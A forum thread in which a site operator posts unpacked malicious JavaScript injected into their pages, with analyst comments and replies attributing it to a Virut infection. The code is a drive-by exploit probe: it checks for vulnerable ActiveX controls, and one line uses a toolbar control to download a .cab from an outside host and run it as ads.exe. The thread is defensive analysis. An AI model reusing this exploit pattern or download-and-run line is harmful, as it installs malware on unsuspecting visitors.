Malicious JS code : 5 ActiveXObjects

Discussion in 'JavaScript' started by anjanesh, Jan 18, 2008.

  1. #1
    Hi

    There's a piece of malicious JS code being injected into the pages on our network. It was packed (an eval of a packer function), and after unpacking it to see its contents, I see that it creates a whole set of ActiveXObjects.

    Does anyone have any clue as to what this may be doing?
    What on earth is clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ?
    // Analyst notes (comments only; the posted code is left as-is).
    // Overall flow: run at most once per browser per day (gated by the 'OKSUN' cookie),
    // probe for a set of ActiveX controls, and document.write() content into the page
    // for each control that is present. Every document.write("") below is empty, so the
    // per-control payloads appear to have been stripped before posting -- presumably the
    // original injected markup (script tags) carried the control-specific content.
    // Detection handles visible in this sample: the cookie marker 'OKSUN=SUN', the
    // CLSID on the setAttribute line, the "Adodb.Stream" createobject call, and the
    // download URL on the DloadDS line.
    if (document.cookie.indexOf('OKSUN') == -1)
     {
            try
             {
                    // Pattern used throughout: declare a var, then reuse it as the catch
                    // parameter. In IE's JScript the catch binding leaks into the enclosing
                    // scope, so after a failed creation the var holds the Error object, which
                    // stringifies to "[object Error]"; a non-Error value means the probe succeeded.
                    var e;
                    var ado = (document.createElement("object"));
                    // This CLSID is (to my knowledge) the Microsoft RDS.DataSpace control
                    // shipped with MDAC; the next line calls its createobject method to
                    // instantiate Adodb.Stream from the page, a classic browser-side file
                    // write vector. Mitigation is a patched MDAC / kill-bit for the control;
                    // confirm the CLSID against a registry lookup.
                    ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
                    var as = ado.createobject("Adodb.Stream", "")
             }
            // NOTE(review): the ';' between catch and finally is not valid in a
            // standards parser; either the unpacking mangled it or JScript tolerated it.
            catch(e){};
            finally
             {
                    // Set the 24-hour marker cookie so the probe does not repeat on reload.
                    var expires = new Date();
                    expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
                    document.cookie = 'OKSUN=SUN;path=/;expires=' + expires.toGMTString();
                    // Closes the injected <script> element the sample was written into.
                    document.write("<\/script>");
    
                    // RDS/Adodb.Stream path succeeded: the (stripped) primary payload went here.
                    if(e != "[object Error]")
                     {
                            document.write("<\/script>")
                     }
                    // Otherwise fall back to probing third-party ActiveX controls one by one.
                    // Each ProgID names a media-player or toolbar control; a successful
                    // `new ActiveXObject` only proves the control is installed.
                    else
                     {
                            try
                             {
                                    var f;
                                    var storm = new ActiveXObject("MPS.StormPlayer")
                             }
                            catch(f){};
                            finally
                             {
                                    if (f != "[object Error]")
                                    {
                                           document.write("<\/script>");
                                           document.write("")
                                    }
                             }
    
                            try
                             {
                                    var g;
                                    var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
                             }
                            catch(g){};
                            finally
                             {
                                    if (g != "[object Error]")
                                     {
                                            document.write("<\/script>");
                                            document.write("")
                                     }
                             }
    
                            try
                             {
                                    var h;
                                    var thunder = new ActiveXObject("DPClient.Vod")
                             }
                            catch(h){};
                            finally
                             {
                                    if (h != "[object Error]")
                                     {
                                            document.write("<\/script>");
                                            document.write("")
                                     }
                             }
    
                            try
                             {
                                    var i;
                                    var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
                             }
                            catch(i){};
                            finally
                             {
                                    if (i != "[object Error]")
                                     {
                                            document.write("")
                                     }
                             }
    
                            try
                             {
                                    var j;
                                    var obj = new ActiveXObject("BaiduBar.Tool")
                             }
                            catch(j){};
                            finally
                             {
                                    if (j != "[object Error]")
                                     {
                                            // The one drop-and-run action still visible in the sample:
                                            // the toolbar control's DloadDS method fetches the .cab from
                                            // the listed host and saves/runs it as ads.exe. Treat the URL
                                            // and host on this line as indicators to block and hunt for.
                                            obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
                                            document.write("")
                                     }
                             }
    
                            // No control found at all: a last-resort payload (also stripped) went here.
                            if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
                             {
                                    document.write("")
                             }
                     }
             }
     }
     
    anjanesh, Jan 18, 2008 IP
  2. MMJ

  3. joebert

    #3
    It looks like it's attempting to create an instance of a video player or the Baidu Search toolbar, or to download an installer.
    Either to artificially inflate some numbers somewhere, or to install some nastyware.

    That code itself is the least of your worries; how it got there is your primary concern.
     
    joebert, Jan 21, 2008 IP
  4. anjanesh

    #4
    Apparently, this is the result of a Virut.AC virus, which seems to be a case of ARP poisoning/spoofing.
     
    anjanesh, Jan 21, 2008 IP